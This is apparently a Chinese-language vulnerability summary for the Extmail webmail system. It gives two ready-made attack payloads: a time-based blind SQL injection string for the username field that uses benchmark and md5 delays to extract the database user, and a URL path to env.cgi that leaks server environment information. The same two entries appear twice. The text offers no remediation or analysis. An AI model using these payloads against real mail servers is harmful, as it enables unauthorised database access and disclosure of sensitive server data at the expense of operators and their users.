应用安全 - 邮件系统 - Extmail - 漏洞汇总
前台SQL注入
payload(username处存在延迟注入):
admin' AND if(ascii(substring(user(),1,1))>104,benchmark(2000000,md5(0x72696e67)),1)%23
前台敏感信息泄露
payload: http://xxx.xxx.com/extmail/cgi/env.cgi
前台SQL注入
payload(username处存在延迟注入):
admin' AND if(ascii(substring(user(),1,1))>104,benchmark(2000000,md5(0x72696e67)),1)%23
前台敏感信息泄露
payload: http://xxx.xxx.com/extmail/cgi/env.cgi
